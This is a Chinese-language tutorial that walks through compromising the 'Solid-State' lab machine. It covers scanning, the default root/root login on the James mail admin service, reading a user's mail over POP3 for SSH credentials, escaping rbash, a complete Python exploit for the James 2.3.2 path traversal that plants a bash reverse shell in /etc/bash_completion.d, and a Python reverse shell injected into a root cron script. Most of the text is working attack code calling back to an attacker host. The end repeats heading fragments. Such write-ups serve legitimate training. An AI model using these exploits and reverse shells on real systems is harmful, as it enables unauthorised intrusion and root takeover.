Solid-State POP3邮件服务(James)+rbash逃逸渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap对目标进行扫描：<\/p>
nmap -p- 192.168.8.100 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放端口及服务：

22\/tcp: OpenSSH 7.4p1 Debian 10+deb9u1<\/li>
25\/tcp: JAMES smtpd 2.3.2<\/li>
80\/tcp: Apache httpd 2.4.25<\/li>
110\/tcp: JAMES pop3d 2.3.2<\/li>
119\/tcp: JAMES nntpd<\/li>
4555\/tcp: JAMES Remote Admin 2.3.2<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 服务识别<\/h3>
重点关注JAMES邮件服务的管理接口(4555端口)，已知默认凭证为root\/root。<\/p>
2. 初始访问<\/h2>
2.1 利用James管理接口<\/h3>

连接到James管理服务：<\/li>
<\/ol>
nc 192.168.8.100 4555<\/span>
<\/span><\/span><\/code><\/pre>
使用默认凭证登录：<\/li>
<\/ol>
root
root
<\/code><\/pre>

修改用户mindy的密码：<\/li>
<\/ol>
setpassword mindy mindy
<\/code><\/pre>
2.2 通过POP3获取凭证<\/h3>

连接到POP3服务：<\/li>
<\/ol>
nc -nC 192.168.8.100 110<\/span>
<\/span><\/span><\/code><\/pre>
获取邮件内容：<\/li>
<\/ol>
user mindy
pass mindy
list
retr 2
<\/code><\/pre>
从邮件中获取到凭证：<\/p>

用户名: mindy<\/li>
密码: P@55W0rd1!2@<\/li>
<\/ul>
3. SSH登录与rbash逃逸<\/h2>
3.1 受限shell环境<\/h3>
使用获取的凭证登录SSH：<\/p>
ssh mindy@192.168.8.100
<\/span><\/span><\/code><\/pre>发现用户处于受限的rbash环境，具有以下限制：<\/p>

禁止更改目录(cd命令)<\/li>
禁止设置\/取消设置shell选项和位置参数<\/li>
禁止执行包含斜杠(\/)的命令<\/li>
禁止重定向输出<\/li>
禁止更改$PATH环境变量<\/li>
禁止导入和定义函数<\/li>
<\/ul>
3.2 rbash逃逸技术<\/h3>
使用SSH的-t选项绕过rbash限制：<\/p>
ssh mindy@192.168.8.100 -t bash
<\/span><\/span><\/code><\/pre>原理分析：<\/p>

-t<\/code>选项强制分配伪终端<\/li>
直接启动新shell，覆盖默认的rbash<\/li>
绕过rbash的限制，因为命令由远程SSH服务处理而非rbash内部<\/li>
<\/ol>
4. 权限提升<\/h2>
4.1 利用James目录穿越漏洞<\/h3>
使用Python脚本利用James的目录穿越漏洞：<\/p>
#!\/usr\/bin\/python3<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span># 默认凭证<\/span>
<\/span><\/span>user =<\/span> 'root'<\/span>
<\/span><\/span>pwd =<\/span> 'root'<\/span>
<\/span><\/span>
<\/span><\/span>if<\/span> len(sys.<\/span>argv) !=<\/span> 4<\/span>:
<\/span><\/span>    sys.<\/span>stderr.<\/span>write("[-]Usage: python3 <\/span>%s<\/span> <remote ip> <local ip> <local listener port><\/span>\n<\/span>"<\/span> %<\/span> sys.<\/span>argv[0<\/span>])
<\/span><\/span>    sys.<\/span>stderr.<\/span>write("[-]Example: python3 <\/span>%s<\/span> 172.16.1.66 172.16.1.139 443<\/span>\n<\/span>"<\/span> %<\/span> sys.<\/span>argv[0<\/span>])
<\/span><\/span>    sys.<\/span>stderr.<\/span>write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.<\/span>\n<\/span>"<\/span>)
<\/span><\/span>    sys.<\/span>exit(1<\/span>)
<\/span><\/span>
<\/span><\/span>remote_ip =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>local_ip =<\/span> sys.<\/span>argv[2<\/span>]
<\/span><\/span>port =<\/span> sys.<\/span>argv[3<\/span>]
<\/span><\/span>
<\/span><\/span># 反向shell payload<\/span>
<\/span><\/span>payload =<\/span> '\/bin\/bash -i >& \/dev\/tcp\/'<\/span> +<\/span> local_ip +<\/span> '\/'<\/span> +<\/span> port +<\/span> ' 0>&1'<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> recv<\/span>(s):
<\/span><\/span>    s.<\/span>recv(1024<\/span>)
<\/span><\/span>    time.<\/span>sleep(0.2<\/span>)
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    # 连接到James管理接口<\/span>
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM)
<\/span><\/span>    s.<\/span>connect((remote_ip,4555<\/span>))
<\/span><\/span>    s.<\/span>recv(1024<\/span>)
<\/span><\/span>    s.<\/span>send((user +<\/span> "<\/span>\n<\/span>"<\/span>).<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>recv(1024<\/span>)
<\/span><\/span>    s.<\/span>send((pwd +<\/span> "<\/span>\n<\/span>"<\/span>).<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>recv(1024<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 创建恶意用户<\/span>
<\/span><\/span>    s.<\/span>send("adduser etc\/bash_completion.d exploit<\/span>\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>recv(1024<\/span>)
<\/span><\/span>    s.<\/span>send("quit<\/span>\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>close()
<\/span><\/span>    
<\/span><\/span>    # 连接到SMTP服务发送恶意邮件<\/span>
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM)
<\/span><\/span>    s.<\/span>connect((remote_ip,25<\/span>))
<\/span><\/span>    s.<\/span>send("ehlo team@team.pl<\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    recv(s)
<\/span><\/span>    s.<\/span>send("mail from: <'@team.pl><\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    recv(s)
<\/span><\/span>    s.<\/span>send("rcpt to:etc\/bash_completion.d><\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    recv(s)
<\/span><\/span>    s.<\/span>send("data<\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    recv(s)
<\/span><\/span>    s.<\/span>send("From: team@team.pl<\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>send("<\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>send("'<\/span>\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>send((payload +<\/span> "<\/span>\n<\/span>"<\/span>).<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    s.<\/span>send("<\/span>\r\n<\/span>.<\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    recv(s)
<\/span><\/span>    s.<\/span>send("quit<\/span>\r\n<\/span>"<\/span>.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    recv(s)
<\/span><\/span>    s.<\/span>close()
<\/span><\/span>    
<\/span><\/span>    print("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH)."<\/span>)
<\/span><\/span>    if<\/span> '\/bin\/bash'<\/span> in<\/span> payload:
<\/span><\/span>        print("[+]Don't forget to start a listener on port"<\/span>, port, "before logging in!"<\/span>)
<\/span><\/span>except<\/span>:
<\/span><\/span>    print("Connection failed."<\/span>)
<\/span><\/span><\/code><\/pre>关键步骤：<\/p>

通过管理接口创建恶意用户etc\/bash_completion.d<\/code><\/li>
通过SMTP发送邮件到..etc\/bash_completion.d<\/code>，利用目录穿越漏洞<\/li>
恶意代码会被写入\/etc\/bash_completion.d<\/code>目录<\/li>
当用户登录时，Bash会自动执行该目录下的脚本<\/li>
<\/ol>
执行流程：<\/p>

启动监听：<\/li>
<\/ol>
nc -lvnp 10032<\/span>
<\/span><\/span><\/code><\/pre>
运行漏洞利用脚本：<\/li>
<\/ol>
python3 exp.py 192.168.8.100 192.168.8.107 10032<\/span>
<\/span><\/span><\/code><\/pre>
通过SSH登录触发payload：<\/li>
<\/ol>
ssh mindy@192.168.8.100
<\/span><\/span><\/code><\/pre>4.2 进一步权限提升<\/h3>

上传pspy32工具监控进程：<\/li>
<\/ol>
chmod +x pspy32
<\/span><\/span><\/code><\/pre>

发现root用户定期执行\/opt\/tmp.py<\/code><\/p>
<\/li>

检查文件权限：<\/p>
<\/li>
<\/ol>
ls -la \/opt\/tmp.py
<\/span><\/span><\/code><\/pre>
修改\/opt\/tmp.py<\/code>添加反向shell代码：<\/li>
<\/ol>
import<\/span> socket,<\/span>subprocess,<\/span>os
<\/span><\/span>s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM)
<\/span><\/span>s.<\/span>connect(("192.168.8.107"<\/span>,10033<\/span>))
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),0<\/span>)
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),1<\/span>)
<\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),2<\/span>)
<\/span><\/span>import<\/span> pty
<\/span><\/span>pty.<\/span>spawn("\/bin\/bash"<\/span>)
<\/span><\/span><\/code><\/pre>
启动监听等待root shell：<\/li>
<\/ol>
nc -lvnp 10033<\/span>
<\/span><\/span><\/code><\/pre>5. 关键知识点总结<\/h2>


James邮件服务漏洞<\/strong>：<\/p>

默认凭证root\/root<\/li>
目录穿越漏洞允许写入任意文件<\/li>
可通过SMTP服务利用<\/li>
<\/ul>
<\/li>

rbash逃逸技术<\/strong>：<\/p>

使用SSH的-t<\/code>选项启动完整bash<\/li>
绕过路径限制和环境变量限制<\/li>
<\/ul>
<\/li>

持久化技术<\/strong>：<\/p>

利用\/etc\/bash_completion.d<\/code>自动执行<\/li>
利用cron job或定时任务<\/li>
<\/ul>
<\/li>

权限提升路径<\/strong>：<\/p>

从普通用户到root的多种方法<\/li>
监控系统进程发现提权机会<\/li>
<\/ul>
<\/li>

防御措施<\/strong>：<\/p>

更改默认凭证<\/li>
更新James邮件服务版本<\/li>
限制rbash用户的权限<\/li>
监控敏感目录如\/etc\/bash_completion.d<\/code>的修改<\/li>
<\/ul>
<\/li>
<\/ol>
Solid-State POP3邮件服务(James)+rbash逃逸渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.2 服务识别<\/h3> 重点关注JAMES邮件服务的管理接口(4555端口)，已知默认凭证为root\/root。<\/p>

2. 初始访问<\/h2>

3. SSH登录与rbash逃逸<\/h2>

4. 权限提升<\/h2>

1.2 服务识别<\/h3>
重点关注JAMES邮件服务的管理接口(4555端口)，已知默认凭证为root\/root。<\/p>
